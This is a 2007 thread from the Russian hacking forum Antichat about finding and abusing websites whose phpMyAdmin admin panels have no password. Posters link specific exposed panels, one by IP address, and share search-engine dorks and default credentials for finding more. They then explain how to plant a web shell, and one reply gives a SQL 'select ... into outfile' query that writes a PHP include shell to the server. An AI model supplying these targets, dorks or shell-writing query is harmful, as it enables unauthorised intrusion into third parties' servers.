Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Сайты с открытыми админками (https://forum.antichat.xyz/showthread.php?t=39857)

mr.The 09.05.2007 14:28

Сайты с открытыми админками
 
Ненашел похожей темы и решл создать. есть сайты админы которых полные ламеры и незащищают админки паролями. Предлагаю в этой теме давать ссылки на на сайты этих типов.

Цитата:

http://85.114.241.23/phpmyadmin/server_status.php?lang=ru-win1251&server=1
Цитата:

http://mazdie.tushino.com/phpMyAdmin/main.php?lang=ru-win1251&server=1

Ksander 09.05.2007 14:38

inurl:/phpMyAdmin/main.php

Вот тебе и список.

mr.The 09.05.2007 14:50

Цитата:

inurl:/phpMyAdmin/main.php

Вот тебе и список.
невсегда так.
иногда нужны более извращённые методы

Zitt 09.05.2007 16:37

inurl:main.php Welcome to phpMyAdmin

fly 09.05.2007 17:39

Можно попробовать поискать /Ftp и /uploads , например, бывает что есть обычная html страничка с формой для отправки файла на сервер. Способ 2 нахождения админки( 5-8%)
По дефолту стоит пароль и логин admin и т.п. Ну и оськомерц там вроде админка иногда без пасса или .htpasswd. Запрос для upload filetype:html inurl:uploads site:com!

BromTyZ 14.05.2007 09:03

http://forum.antichat.ru/thread40031.html
Заходим суда, тут сканер таких дир!

PahaN33 14.05.2007 20:00

обьясните новичку, как через пхпмуадмин, заливать файлы, на сервер... :(((( оч прошу помогите

fly 15.05.2007 00:24

Вообще долго рассказывать, но например есть у тебя доступ в phpmyadmin(если есть базы). Изучаешь структуру баз(залей дамп всей или части базы на хард), затем можно просто либо проинклудить определенный параметр в таблицы определенной базы (смотри тему phpbb) либо создать файл(твой шелл), также если данная база, которую ты решил изучить имеет характер Скрипт-Галерея или какой-либо upload файлов различных расширений , что мешает добавить тот же *.php формат, дело вкуса! Удачи!

p-range 15.05.2007 00:40

Цитата:

обьясните новичку, как через пхпмуадмин, заливать файлы, на сервер... ((( оч прошу помогите
если есть права, выполняй запрос:
Код:

select '<?include($_GET[bravo])?>' from table into outfile '/patch/to/file.php';

PahaN33 17.05.2007 21:45

2 p-range

блин запрос выполняеться, но пишет что неможет создать файл. :(


Время: 17:54